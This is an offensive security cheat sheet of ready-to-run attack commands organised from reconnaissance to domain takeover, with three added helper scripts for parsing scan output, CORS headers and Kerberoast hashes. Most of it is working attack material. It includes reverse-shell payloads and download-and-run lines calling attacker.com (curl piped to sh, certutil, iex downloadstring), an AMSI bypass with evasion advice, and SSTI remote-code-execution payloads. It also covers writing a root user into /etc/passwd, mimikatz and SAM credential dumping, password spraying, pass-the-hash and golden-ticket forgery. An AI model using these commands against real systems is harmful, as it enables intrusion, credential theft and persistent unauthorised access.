159 commands across 13 phases — from first recon to persistence.

Passive subdomain discovery via multiple APIs (VT, Shodan, C99, etc.)
subfinder -d target.com -all -recursive -o subs.txt

OWASP Amass passive mode — no direct DNS queries to target
amass enum -passive -d target.com -o amass-passive.txt

Fast subdomain discovery using certificate transparency and APIs
assetfinder --subs-only target.com | tee subs-asset.txt

Gather emails, subdomains, IPs, employee names across all sources
theHarvester -d target.com -b all -f harvester-out

Pull subdomains from public certificate logs — no auth required
curl -s "https://crt.sh/?q=%.target.com&output=json" | jq -r '.[].name_value' | sort -u | tee crtsh.txt

Registrar, nameservers, abuse contacts, registration dates
whois target.com
whois 1.2.3.4

Pull all DNS record types: A, NS, MX, TXT, SOA, CNAME
dig target.com ANY +noall +answer
dig target.com NS +short
dig target.com MX +short
dig target.com TXT +short
dig @8.8.8.8 target.com A +short
Many servers answer ANY with a minimal RFC 8482 response; query each record type explicitly if ANY returns little

Attempt full zone transfer — exposes all records if misconfigured
dig axfr @ns1.target.com target.com

Standard DNS enum then brute-force subdomains with wordlist
dnsrecon -d target.com -t std
dnsrecon -d target.com -t brt -D /usr/share/seclists/Discovery/DNS/namelist.txt

Find exposed services, open ports and banners via Shodan
shodan domain target.com
shodan host 1.2.3.4
shodan search "ssl.cert.subject.cn:target.com" --fields ip_str,port,org
Requires an API key: run shodan init API_KEY once to store it
Get all URLs from Wayback, URLScan, OTX — includes old endpoints
gau --threads 5 target.com | tee urls-gau.txt
gau --subs target.com | grep -v '\.css\|\.js\|\.png\|\.jpg' | tee urls-filtered.txt
The \.js filter also drops .json and .jsp URLs; anchor it (\.js$) if you want those kept

Pull URLs from Wayback Machine and filter for server-side scripts
waybackurls target.com | tee wayback.txt
grep '\.php\|\.asp\|\.aspx\|\.jsp' wayback.txt | sort -u

Find exposed files, admin panels and indexed sensitive content (Google dorks)
site:target.com filetype:pdf
site:target.com inurl:admin
site:target.com ext:php intitle:index
site:target.com -www
"@target.com" filetype:xls

Find leaked API keys, tokens and credentials in public repos
trufflehog github --org=targetorg --only-verified
trufflehog git https://github.com/targetorg/repo --only-verified

Active DNS brute-force — resolves and returns live subdomains
dnsx -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -resp -o dnsx-out.txt
cat subs.txt | dnsx -resp -a -cname

ICMP + ARP sweep to find live hosts on a subnet
nmap -sn 192.168.1.0/24 --open -oG hosts-alive.txt
nmap -sn 192.168.1.0/24 | grep "Nmap scan" | awk '{print $NF}'
ARP is only used on the local segment; off-link subnets get ICMP/TCP probes, which firewalls often drop, so add -Pn and a small port scan if a known host is missing

Fast ICMP sweep — faster than nmap for large ranges
fping -ag 192.168.1.0/24 2>/dev/null | tee alive-hosts.txt

Find all IP ranges owned by a company via ASN lookup
curl -s "https://api.bgpview.io/search?query_term=target.com" | jq '.data.asns[].asn'
whois -h whois.radb.net -- '-i origin AS12345' | grep ^route

All 65535 TCP ports, fast rate — good first pass
nmap -p- --min-rate 5000 -T4 target.com -oN nmap-allports.txt

Version detection + default NSE scripts on specific open ports
nmap -sV -sC -p 22,80,443,3389 target.com -oN nmap-services.txt

OS detection, version, scripts and traceroute in one pass
nmap -A -T4 target.com -oN nmap-aggressive.txt
Noisy — avoid on evasive engagements

Common UDP services: SNMP (161), DNS (53), NTP (123), TFTP (69)
nmap -sU --top-ports 100 target.com -oN nmap-udp.txt
Requires root/sudo

Check for MS17-010 (EternalBlue), MS08-067 and other SMB CVEs, and enumerate shares
nmap --script "smb-vuln*" -p 445 target.com
nmap --script smb-enum-shares,smb-enum-users -p 445 target.com
Quote the glob so the shell does not expand it; SMBGhost (CVE-2020-0796) is not covered by the stock smb-vuln scripts and needs a community NSE script

Fastest raw port scanner — sweeps entire ranges in seconds
masscan -p1-65535 10.0.0.0/24 --rate=10000 -oL masscan-out.txt
masscan -p80,443,8080,8443 10.0.0.0/24 --rate=50000
Requires root — use lower rate in shared environments

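Added example, not from the original cheat sheet: a small script that folds masscan's -oL output into one "host ports" line per host, so the follow-up nmap -sV -sC pass only touches ports masscan actually found open instead of rescanning everything. The masscan output embedded below is constructed, not a real scan result.

```shell
#!/bin/sh
# Added example, not from the original cheat sheet.
# masscan -oL writes one line per finding: "open tcp <port> <ip> <unix-time>",
# plus "#masscan" / "# end" comment lines that must be skipped.

masscan_to_targets() {
  # $1: masscan -oL output file. Prints "<ip> <port,port,...>" per host, sorted by IP.
  awk '$1 == "open" && $2 == "tcp" {
         ports[$4] = (ports[$4] == "") ? $3 : ports[$4] "," $3
       }
       END { for (h in ports) print h, ports[h] }' "$1" | sort
}

# Constructed sample of masscan -oL output (not a real scan result)
SAMPLE_OL=$(mktemp)
cat > "$SAMPLE_OL" <<'EOF'
#masscan
open tcp 445 10.0.0.5 1700000000
open tcp 22 10.0.0.5 1700000001
open tcp 80 10.0.0.7 1700000002
open tcp 443 10.0.0.7 1700000003
# end
EOF

masscan_to_targets "$SAMPLE_OL"

# Hand the result to nmap, one service scan per host:
#   masscan_to_targets masscan-out.txt | while read -r host ports; do
#     nmap -sV -sC -p "$ports" "$host" -oN "nmap-$host.txt"
#   done
```

Keeping the per-host port list instead of a flat union of all ports matters on /24s and larger: nmap's service probes are slow, and scanning every host for every port any host had open multiplies the runtime and the noise.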
Finds open ports in seconds then pipes directly to nmap for service scan
rustscan -a target.com --ulimit 5000 -- -sV -sC
rustscan -a 10.0.0.0/24 -r 1-65535 --ulimit 5000 -- -sV

Probe HTTP/HTTPS on all subdomains — detect tech, status, redirects
cat subs.txt | httpx -title -tech-detect -status-code -o httpx-out.txt
httpx -l subs.txt -follow-redirects -status-code -title -server -td -mc 200,301,302,403

Fast SYN port scanner from ProjectDiscovery — pairs well with httpx
naabu -host target.com -p - -o naabu-ports.txt
cat subs.txt | naabu -top-ports 1000 -o naabu-out.txt

Screenshot every live web target and generate browsable HTML report
gowitness scan file -f web-alive.txt --write-db
gowitness scan single -u https://target.com
gowitness report server # serves the report UI from the database written above

Fast directory brute-force — auto-calibrates to filter false positives
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -u https://target.com/FUZZ -ac -o ffuf-dirs.json

Discover backup files, config leaks, server-side scripts by extension
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -u https://target.com/FUZZ -e .php,.asp,.aspx,.bak,.txt,.xml,.config -ac

Find virtual hosts not exposed in DNS — common in internal apps
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u https://target.com -H "Host: FUZZ.target.com" -ac -fs 0

Discover hidden GET parameters — entry point for injection attacks
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u "https://target.com/page?FUZZ=test" -ac
ffuf -w params.txt -u "https://target.com/page?FUZZ=test" -ac -fs 0

Fuzz POST body parameters for hidden inputs
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u https://target.com/api/endpoint -X POST -d "FUZZ=test" -H "Content-Type: application/x-www-form-urlencoded" -ac

Classic directory enum with extension support
gobuster dir -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,asp,aspx -t 50 -o gobuster-dirs.txt

Brute-force DNS subdomains via direct resolution
gobuster dns -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50 -o gobuster-dns.txt

Auto-recurses into discovered directories — catches deeper paths
feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt --depth 3 --auto-tune -o ferox-out.txt

Quick scan for misconfigs, dangerous files, outdated software
nikto -h https://target.com -o nikto-out.txt -Format txt
nikto -h https://target.com -Tuning 4
Noisy — easily detected by WAF/IDS
Identify CMS, frameworks, server versions, JS libraries
whatweb -a 3 https://target.com
whatweb -i targets.txt --log-json whatweb-out.json

Detect and identify Web Application Firewalls before attacking
wafw00f https://target.com
wafw00f -l # list known WAFs

Template-based scanner — covers CVEs, misconfigs, exposed panels
nuclei -u https://target.com -t ~/nuclei-templates/ -severity critical,high -o nuclei-out.txt
nuclei -l web-alive.txt -t ~/nuclei-templates/cves/ -rate-limit 50

Find API keys, tokens and endpoints hardcoded in JavaScript files
trufflehog filesystem /path/to/js/ --only-verified
gau target.com | grep '\.js$' | httpx -sr -o js-files.txt

Check if server reflects arbitrary Origin — CORS misconfiguration
curl -s -I -H "Origin: https://evil.com" https://target.com/api/data | grep -i 'access-control'
A reflected Origin together with Access-Control-Allow-Credentials: true is the exploitable case; -I sends HEAD, so retry with a GET (-s -D - -o /dev/null) if no CORS headers come back
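Added example, not from the original cheat sheet: a verdict function for the curl check above. It takes the Origin you sent as its argument and reads the raw response headers from stdin, then distinguishes the exploitable case (reflected Origin plus credentials) from the harmless ones (wildcard, or a fixed allowed origin). The two header blocks embedded below are constructed samples, not captured from any real host.

```shell
#!/bin/sh
# Added example, not from the original cheat sheet.
# Reflected Origin + Allow-Credentials: true means any site can read the
# authenticated response with fetch(url, {credentials: 'include'}).

cors_verdict() {
  # $1: Origin value that was sent; stdin: raw HTTP response headers
  origin="$1"
  hdrs=$(cat)
  acao=$(printf '%s\n' "$hdrs" | grep -i '^access-control-allow-origin:' | head -n 1 \
         | cut -d' ' -f2- | tr -d '\r')
  acac=$(printf '%s\n' "$hdrs" | grep -i '^access-control-allow-credentials:' | head -n 1 \
         | cut -d' ' -f2- | tr -d '\r' | tr '[:upper:]' '[:lower:]')
  if [ "$acao" = "$origin" ] && [ "$acac" = "true" ]; then
    echo "VULNERABLE: arbitrary Origin reflected with credentials"
  elif [ "$acao" = "$origin" ]; then
    echo "REFLECTED: Origin reflected, no credentials (unauthenticated data only)"
  elif [ "$acao" = "*" ]; then
    echo "WILDCARD: browsers refuse credentials with *, only public data is exposed"
  else
    echo "OK: Origin not reflected"
  fi
}

# Constructed response headers (not captured from a real host)
VULN_HDRS=$(printf 'HTTP/1.1 200 OK\r\nAccess-Control-Allow-Origin: https://evil.com\r\nAccess-Control-Allow-Credentials: true\r\n')
SAFE_HDRS=$(printf 'HTTP/1.1 200 OK\r\nAccess-Control-Allow-Origin: https://target.com\r\n')

printf '%s' "$VULN_HDRS" | cors_verdict https://evil.com
printf '%s' "$SAFE_HDRS" | cors_verdict https://evil.com

# Live use (GET rather than HEAD, headers only):
#   curl -s -D - -o /dev/null -H "Origin: https://evil.com" https://target.com/api/data | cors_verdict https://evil.com
```

Run it twice per endpoint: once with an unrelated origin such as https://evil.com and once with a subdomain-shaped one such as https://target.com.evil.com, since many "validators" only check that the string starts with or contains the trusted host.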
Enumerate users, groups, shares, password policy — null session first
enum4linux-ng -A target.com -oY enum4linux-out.yaml

Null / guest session share enum — relay-list finds SMB-signing disabled hosts
nxc smb target.com -u '' -p '' --shares
nxc smb target.com -u guest -p '' --shares
nxc smb 192.168.1.0/24 --gen-relay-list relay-targets.txt

List and browse SMB shares manually
smbclient -L //target.com -N
smbclient //target.com/SHARE -N
smbclient //target.com/SHARE -U "domain\user%password"

Download entire share contents recursively
smbclient //target.com/SHARE -U "user%password" -c "recurse; prompt; mget *"

Anonymous LDAP query — gets naming contexts and user attributes
ldapsearch -x -H ldap://target.com -b '' -s base '(objectclass=*)' namingContexts
ldapsearch -x -H ldap://target.com -b 'DC=domain,DC=com' '(objectClass=user)' sAMAccountName mail

Full AD LDAP dump — outputs HTML/JSON files for all objects
ldapdomaindump -u 'domain\user' -p 'password' ldap://dc.target.com -o ldap-dump/

Query Domain Admins, unconstrained delegation, and custom filters
windapsearch -d target.com -u user@target.com -p password --da
windapsearch -d target.com -u user@target.com -p password --unconstrained-users

Enumerate valid AD users via Kerberos pre-auth errors: no password is sent, so nothing gets locked out
kerbrute userenum -d target.com --dc dc.target.com /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -o kerbrute-users.txt
Valid username = the KDC answers the AS-REQ with KDC_ERR_PREAUTH_REQUIRED; unknown names get KDC_ERR_C_PRINCIPAL_UNKNOWN

Single password against all users; each failed pre-auth still counts as a bad password attempt, so read the lockout policy first
kerbrute passwordspray -d target.com --dc dc.target.com users.txt 'Password2024!'
One password at a time to stay below lockout threshold
Brute community strings then walk MIB tree for configs, users, routes
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com
snmpwalk -v2c -c public target.com

Check SSH server for weak algorithms, outdated KEX, and misconfigs
ssh-audit target.com

Check RDP for NLA, encryption level, pre-auth DoS vulnerabilities
rdp-sec-check target.com:3389

List and mount NFS exports — often world-readable
showmount -e target.com
mount -t nfs target.com:/share /mnt/nfs -o nolock
Exports with no_root_squash let a remote root write files as UID 0 on the export; without it, create a local user with the UID that owns the files to read them. showmount -e does not display squash options, so test rather than assume

Enumerate valid mail users via VRFY/EXPN/RCPT TO commands
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t target.com -p 25

Test for publicly exposed database — default or weak credentials
mysql -h target.com -u root -p
nxc mssql target.com -u users.txt -p passwords.txt

Auto-detect and exploit SQLi — enumerate DBs, tables, dump data
sqlmap -u "https://target.com/page?id=1" --batch --dbs
sqlmap -u "https://target.com/page?id=1" --batch -D dbname --tables
sqlmap -u "https://target.com/page?id=1" --batch -D dbname -T users --dump

Use saved Burp request — handles cookies, CSRF tokens automatically
sqlmap -r request.txt --batch --dbs --level 5 --risk 3
sqlmap -r request.txt --batch --os-shell # attempt OS shell if DBA

Spray credentials across SMB — continue-on-success avoids stopping at first hit
nxc smb dc.target.com -u users.txt -p passwords.txt --continue-on-success
nxc smb dc.target.com -u users.txt -p 'Password123!' --continue-on-success
Read the lockout policy first (nxc smb dc.target.com -u user -p pass --pass-pol, or net accounts /domain on a domain host): a common setting is 5 attempts / 30 min, but the Windows default is no lockout at all, and the users.txt x passwords.txt form above will lock accounts if the threshold is low
Brute-force SSH login — -t 4 keeps it under most rate limits
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target.com -t 4
hydra -L users.txt -P passwords.txt ssh://target.com -t 4 -o hydra-ssh.txt

Brute-force web login form — customize fail string to match app response
hydra -l admin -P rockyou.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials" -t 20

Credential stuffing/spraying on web forms using ffuf cluster bomb mode
ffuf -w users.txt:USER -w passwords.txt:PASS -u https://target.com/login -X POST -d "username=USER&password=PASS" -H "Content-Type: application/x-www-form-urlencoded" -fc 302 -mode clusterbomb
-fc 302 assumes a failed login redirects back to the form; many apps do the opposite (302 on success, 200 on failure), so send one known-bad login first and filter on whatever that response looks like (-fc, -fs or -fr)

Test for Local File Inclusion — read /etc/passwd, /proc/self/environ
ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u "https://target.com/page?file=FUZZ" -ac
curl "https://target.com/page?file=../../../../etc/passwd"

Test for SSRF — detect out-of-band DNS/HTTP callbacks to your server
# Use Burp Collaborator or interactsh:
curl "https://target.com/fetch?url=https://YOUR.interactsh.com/ssrf"
interactsh-client # listen for callbacks

XML External Entity — read local files or trigger OOB DNS/HTTP
# Inject into XML body:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
# Blind XXE via OOB (interactsh):
<!DOCTYPE root [<!ENTITY % ext SYSTEM "http://YOUR.interactsh.com/xxe"> %ext;]>
Try Content-Type: application/xml and text/xml — some parsers differ
Server-Side Template Injection — probe with math expressions, escalate to RCE
# Detection — inject into all input fields:
{{7*7}} # Jinja2/Twig → 49
${7*7} # Freemarker → 49
<%= 7*7 %> # ERB → 49
# Jinja2 RCE:
{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}
# Twig RCE:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

Enumerate GraphQL schema, find hidden fields and test batch query abuse
# Introspection query (introspection left enabled in prod = misconfiguration):
curl -X POST https://target.com/graphql -H "Content-Type: application/json" \
  -d '{"query":"{__schema{types{name fields{name}}}}"}'
# Tools:
graphw00f -f -t https://target.com/graphql # fingerprint engine
clairvoyance -o schema.json https://target.com/graphql # rebuild the schema from field-suggestion errors and a wordlist when introspection is disabled
# Batch query abuse (rate-limit bypass, OTP/password brute-force in one request, DoS):
[{"query":"query{user(id:1){email}}"},{"query":"query{user(id:2){email}}"}]

Test for default credentials on admin panels, routers, dev tools
nuclei -u https://target.com -t ~/nuclei-templates/default-logins/ -o default-creds.txt
nuclei -l web-alive.txt -t ~/nuclei-templates/default-logins/

Find and run exploits in Metasploit — rank:excellent = reliable/stable
msfconsole -q
search type:exploit platform:windows rank:excellent cve:2021
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target.com
set LHOST attacker.com
run

Generate staged/stageless reverse shells for multiple platforms
# Linux ELF:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=attacker.com LPORT=4444 -f elf > shell.elf
# Windows EXE:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker.com LPORT=4444 -f exe > shell.exe
# PHP:
msfvenom -p php/reverse_php LHOST=attacker.com LPORT=4444 -f raw > shell.php
The payloads above are stageless (shell_reverse_tcp) and work with a plain nc listener; the staged variants (shell/reverse_tcp) need a Metasploit multi/handler to deliver the second stage

Simple listener + PTY upgrade for interactive shell
nc -lvnp 4444
# Upgrade to PTY after catching:
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Then: Ctrl+Z → stty raw -echo; fg → export TERM=xterm

Establish who you are, where you are, and what OS version is running
id && whoami && hostname && uname -a
cat /etc/os-release
ip a; ip route; cat /etc/hosts
env; cat /proc/version

Find all interactive users — /etc/shadow if you have elevated read
cat /etc/passwd | grep -v nologin | grep -v false
cat /etc/shadow # requires root
getent passwd | awk -F: '$3 >= 1000' # human users

Most comprehensive Linux privesc script — outputs colour-coded findings
# Transfer and run:
python3 -m http.server 8080 # on attacker
curl http://attacker.com:8080/linpeas.sh | sh
# Or save output:
wget http://attacker.com:8080/linpeas.sh -O /tmp/lp.sh && chmod +x /tmp/lp.sh && /tmp/lp.sh | tee /tmp/lp-out.txt

Find SUID binaries — compare against GTFOBins for exploitation paths
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# Check each hit at: https://gtfobins.github.io

List sudo rights — any NOPASSWD binary may lead to root via GTFOBins
sudo -l
# Common exploitable entries:
# (ALL) NOPASSWD: /usr/bin/find → sudo find . -exec /bin/sh \; -quit
# (ALL) NOPASSWD: /usr/bin/vim → sudo vim -c ':!/bin/sh'
# (ALL) NOPASSWD: /usr/bin/python3 → sudo python3 -c 'import os; os.system("/bin/sh")'

Find cron jobs executing scripts you can modify
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
find / -name "*.sh" -perm -002 2>/dev/null # world-writable scripts

Find binaries with dangerous capabilities — cap_setuid means instant root
getcap -r / 2>/dev/null
# cap_setuid+ep on python/perl/ruby/node = trivial root:
# /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Write a new root-level user directly to /etc/passwd
ls -la /etc/passwd
# If writable:
openssl passwd -1 -salt hive hacked123
echo 'hive:$1$hive$...:0:0:root:/root:/bin/bash' >> /etc/passwd
su hive

Docker group membership = root — mount host root FS into container
id # check for docker group
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Escape --privileged container by mounting host block device
# Detect: grep CapEff /proc/1/status; a full capability set (0000003fffffffff or 000001ffffffffff depending on kernel) means --privileged. Decode with capsh --decode=<value>
fdisk -l
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host

Grep config files for hardcoded credentials
grep -rni "password\|passwd\|pwd\|secret\|token\|api_key" /var/www/ /etc/ /home/ 2>/dev/null | grep -v ".pyc\|Binary"
find / -name "*.conf" -o -name "*.config" -o -name "*.ini" -o -name ".env" 2>/dev/null | xargs grep -l "password" 2>/dev/null

History often contains passwords, SSH keys unlock lateral movement
cat ~/.bash_history
cat ~/.zsh_history
find / -name "id_rsa" -o -name "id_ecdsa" -o -name "*.pem" 2>/dev/null
cat ~/.ssh/known_hosts # discover internal hosts

Establish user context, privileges, network config and local admins
whoami /all
systeminfo
ipconfig /all
net user
net localgroup administrators
net share

WinPEAS = Windows equivalent of linpeas — covers all common vectors
# Transfer via certutil:
certutil -urlcache -f http://attacker.com/winPEASx64.exe C:\Windows\Temp\wp.exe
C:\Windows\Temp\wp.exe
# PowerShell:
iex(new-object net.webclient).downloadstring('http://attacker.com/winPEASPS.ps1')

SeImpersonatePrivilege on service accounts = reliable SYSTEM escalation
whoami /priv # look for SeImpersonatePrivilege
# PrintSpoofer (Windows 10/Server 2019+):
PrintSpoofer64.exe -i -c cmd
# GodPotato (works on Win10/11/Server 2016-2022):
GodPotato.exe -cmd "cmd /c whoami"
# RoguePotato (older systems):
RoguePotato.exe -r 192.168.1.100 -e "cmd.exe" -l 9999

Unquoted paths with spaces allow DLL/binary hijacking in intermediate directories
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v "\""
sc qc "VulnerableServiceName"
wmic is removed on recent Windows builds; Get-CimInstance Win32_Service | select Name,PathName,StartMode gives the same columns from PowerShell. You also need write access to one of the intermediate directories for this to be exploitable

Modify service binary path if you have SERVICE_ALL_ACCESS or WRITE_DAC
# PowerSploit / PowerUp:
Get-ModifiableService -Verbose
# Accesschk:
accesschk64.exe -uwcqv "Authenticated Users" * /accepteula
accesschk64.exe -uwcqv * /accepteula 2>nul | findstr "SERVICE_ALL_ACCESS"
Then repoint and restart it: sc config VulnerableService binPath= "C:\Windows\Temp\payload.exe" followed by sc stop / sc start (SERVICE_CHANGE_CONFIG is enough to change the path; start/stop need their own rights or a reboot if the service is auto-start)

If both registry keys = 1, any MSI installs as SYSTEM
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Both = 1: generate and run malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker.com LPORT=4444 -f msi > shell.msi
msiexec /quiet /qn /i shell.msi

Save and exfiltrate SAM hive — extract local NTLM hashes offline
reg save HKLM\SAM C:\Temp\sam.save
reg save HKLM\SYSTEM C:\Temp\system.save
reg save HKLM\SECURITY C:\Temp\security.save
# On attacker:
impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
reg save needs admin/SYSTEM. The live hive files under C:\Windows\System32\config are locked, so if reg save is blocked or monitored, copy them from a Volume Shadow Copy instead (create one with vssadmin create shadow /for=C: and copy from the \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN path)
Dump plaintext passwords, NTLM hashes and Kerberos tickets from memory
.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets
lsadump::sam
lsadump::dcsync /user:domain\krbtgt
sekurlsa::* needs SeDebugPrivilege (privilege::debug) and is blocked by Credential Guard and LSA protection (PPL); lsadump::sam needs SYSTEM (token::elevate); lsadump::dcsync needs replication rights on the domain, not local privileges. Plaintext passwords only appear when WDigest caching is enabled (off by default since Windows 8.1/2012 R2)

Disable AMSI in current PS session — run before loading offensive scripts
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
One-liner: this exact string is signatured by AMSI itself and by most EDR, so obfuscate it or use another technique

Execution policy is not a security boundary — trivial to bypass
powershell -ExecutionPolicy Bypass -File script.ps1
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
iex(new-object net.webclient).downloadstring('http://attacker.com/script.ps1')

Hunt for credentials in files, saved cmdkey entries and PS history
dir /s /b C:\*.txt C:\*.xml C:\*.ini 2>nul | findstr /i "pass"
cmdkey /list
type C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Windows\Panther\Unattend.xml 2>nul
type C:\Windows\system32\sysprep\sysprep.xml 2>nul

Transfer tools to the target without SMB — works through web proxies
# certutil:
certutil -urlcache -f http://attacker.com/file.exe C:\Windows\Temp\file.exe
# PowerShell:
(New-Object Net.WebClient).DownloadFile('http://attacker.com/file.exe','C:\Temp\file.exe')
# Invoke-WebRequest:
iwr http://attacker.com/file.exe -OutFile C:\Temp\file.exe

Collect full AD data — feed ZIP into BloodHound for attack path analysis
# Windows (SharpHound):
.\SharpHound.exe -c All --zipfilename bh-collect.zip
# Linux (bloodhound-python):
bloodhound-python -u user -p 'password' -d target.com -dc dc.target.com -c All -ns dc-ip --zip

PowerView fills in what BloodHound misses (ad-hoc LDAP queries, descriptions, password ages); run Find-LocalAdminAccess first
Import-Module .\PowerView.ps1
Get-NetDomain
Get-DomainUser | select samaccountname,description,pwdlastset
Get-DomainGroupMember -Identity "Domain Admins"
Get-DomainComputer | select name,operatingsystem
Find-LocalAdminAccess -Verbose
Find-LocalAdminAccess scans entire domain — noisy but high-value

Request TGS for SPNs and crack offline — targets service accounts
# Linux:
impacket-GetUserSPNs -request -dc-ip dc-ip 'domain/user:password' -outputfile kerberoast.hashes
hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt
# Windows:
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -Expand Hash > kerberoast.txt
RC4 tickets ($krb5tgs$23$, hashcat -m 13100) crack far faster than AES ones ($krb5tgs$18$ needs -m 19700, $krb5tgs$17$ needs -m 19600); check the etype in each hash before picking the mode, and drop --force from hashcat, since it hides the driver warnings that explain wrong results
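Added example, not from the original cheat sheet: the etype check from the note above as a script. It reads the etype field out of each $krb5tgs$ hash, maps it to the matching hashcat mode and splits a mixed GetUserSPNs output file into one file per mode, so you crack the cheap RC4 tickets first and never feed AES lines to -m 13100. The hash lines embedded below are constructed and truncated, not real tickets.

```shell
#!/bin/sh
# Added example, not from the original cheat sheet.
# GetUserSPNs / Rubeus hashes carry the etype after the second $:
#   $krb5tgs$23$... RC4-HMAC   -> hashcat -m 13100 (fast)
#   $krb5tgs$17$... AES128-CTS -> hashcat -m 19600 (slow)
#   $krb5tgs$18$... AES256-CTS -> hashcat -m 19700 (slow)
# hashcat rejects lines whose format does not match the selected mode,
# so a mixed file silently loses whichever etype you did not pick.

kerberoast_mode() {
  # $1: one hash line; prints the hashcat mode or "unknown"
  case "$1" in
    '$krb5tgs$23$'*) echo 13100 ;;
    '$krb5tgs$17$'*) echo 19600 ;;
    '$krb5tgs$18$'*) echo 19700 ;;
    *)               echo unknown ;;
  esac
}

split_by_mode() {
  # $1: hash file; $2: output dir. Writes <dir>/kerberoast-<mode>.hashes per etype
  # and prints "<mode> <count>" so you can see what is worth cracking first.
  mkdir -p "$2"
  while IFS= read -r line; do
    [ -n "$line" ] || continue
    printf '%s\n' "$line" >> "$2/kerberoast-$(kerberoast_mode "$line").hashes"
  done < "$1"
  for f in "$2"/kerberoast-*.hashes; do
    m=${f##*/kerberoast-}; m=${m%.hashes}
    printf '%s %s\n' "$m" "$(wc -l < "$f" | tr -d ' ')"
  done
}

# Constructed, truncated hash lines (not real tickets)
HASHES=$(mktemp)
cat > "$HASHES" <<'EOF'
$krb5tgs$23$*svc_sql$TARGET.COM$target.com/svc_sql*$1a2b3c$deadbeef
$krb5tgs$18$*svc_web$TARGET.COM$target.com/svc_web*$4d5e6f$cafebabe
$krb5tgs$23$*svc_bak$TARGET.COM$target.com/svc_bak*$7a8b9c$feedface
EOF
OUTDIR=$(mktemp -d)
split_by_mode "$HASHES" "$OUTDIR"

# Then crack the cheap ones first:
#   hashcat -m 13100 "$OUTDIR/kerberoast-13100.hashes" /usr/share/wordlists/rockyou.txt
```

An account that only returns etype 18 tickets has "This account supports Kerberos AES 256 bit encryption" set and no RC4 fallback; unless the password is in a wordlist it is usually not worth the GPU time, which is exactly why the split is useful.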
Exploit accounts with "Do not require Kerberos pre-authentication" enabled
impacket-GetNPUsers -usersfile users.txt -no-pass -dc-ip dc-ip 'domain/' -format hashcat -outputfile asrep.hashes
hashcat -m 18200 asrep.hashes /usr/share/wordlists/rockyou.txt

Simulate DC replication to pull all NTLM hashes — needs DS-Replication rights
# Linux:
impacket-secretsdump -just-dc-ntlm 'domain/user:password@dc-ip'
impacket-secretsdump -just-dc-ntlm -just-dc-user krbtgt 'domain/user:password@dc-ip'
# Windows (mimikatz):
lsadump::dcsync /domain:target.com /user:Administrator
Requires: Domain Admin, or any principal holding DS-Replication-Get-Changes plus DS-Replication-Get-Changes-All on the domain object (historically the Exchange Windows Permissions group could grant itself this through WriteDACL)

Authenticate with NTLM hash directly — no plaintext password needed
impacket-psexec -hashes :NTLM_HASH administrator@target.com
evil-winrm -i target.com -u administrator -H NTLM_HASH
nxc smb target.com -u administrator -H NTLM_HASH --exec-method mmcexec -x "whoami"

Inject Kerberos ticket into session — bypasses NTLM hash requirement
# Export tickets (mimikatz):
sekurlsa::tickets /export
kerberos::ptt ticket.kirbi
# Linux:
export KRB5CCNAME=/path/to/ticket.ccache
impacket-psexec -k -no-pass target.com
With -k the target must be the hostname from the ticket's SPN (not an IP) and must resolve; add the DC to /etc/hosts or point DNS at it

Forge TGT with krbtgt hash — persistent domain access, survives password resets
# Requires: krbtgt NTLM hash + domain SID
# mimikatz:
kerberos::golden /user:Administrator /domain:target.com /sid:S-1-5-21-XXX /krbtgt:HASH /ptt
# Linux:
impacket-ticketer -nthash KRBTGT_HASH -domain-sid S-1-5-21-XXX -domain target.com Administrator
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass dc.target.com
The ticket survives ordinary user password resets, but a double reset of the krbtgt account invalidates it

ESC1: enroll in template with SAN and impersonate any user including DA
certipy find -u user@target.com -p 'password' -dc-ip dc-ip -vulnerable
